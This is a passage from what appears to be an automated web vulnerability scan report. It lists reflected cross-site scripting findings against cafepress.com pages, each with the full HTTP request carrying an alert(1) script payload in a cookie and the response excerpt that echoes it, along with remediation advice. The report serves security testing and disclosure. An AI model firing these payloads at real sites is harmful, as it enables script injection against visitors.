ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59192
Date: Sun, 26 Dec 2010 13:48:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.49. http://www.cafepress.com/+magnets [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a93</script><script>alert(1)</script>a21dc3c1ba6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1a93</script><script>alert(1)</script>a21dc3c1ba6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59206 Date: Sun, 26 Dec 2010 13:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59206 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'f1a93</script><script>alert(1)</script>a21dc3c1ba6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.50. http://www.cafepress.com/+mousepads [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mousepads
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2de4"-alert(1)-"8af102be85f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 56880 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.51. http://www.cafepress.com/+mousepads [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mousepads
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6760</script><script>alert(1)</script>1c00c257e15 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mousepads HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a6760</script><script>alert(1)</script>1c00c257e15 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 56907 Date: Sun, 26 Dec 2010 13:48:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/ Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 56907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'a6760</script><script>alert(1)</script>1c00c257e15 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.52. http://www.cafepress.com/+mugs [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mugs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49177"-alert(1)-"acf862ea6e2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 60103 Date: Sun, 26 Dec 2010 13:47:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60103 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.53. http://www.cafepress.com/+mugs [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+mugs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6774f</script><script>alert(1)</script>147c0c0a55c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=6774f</script><script>alert(1)</script>147c0c0a55c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 60125 Date: Sun, 26 Dec 2010 13:47:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60125 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = 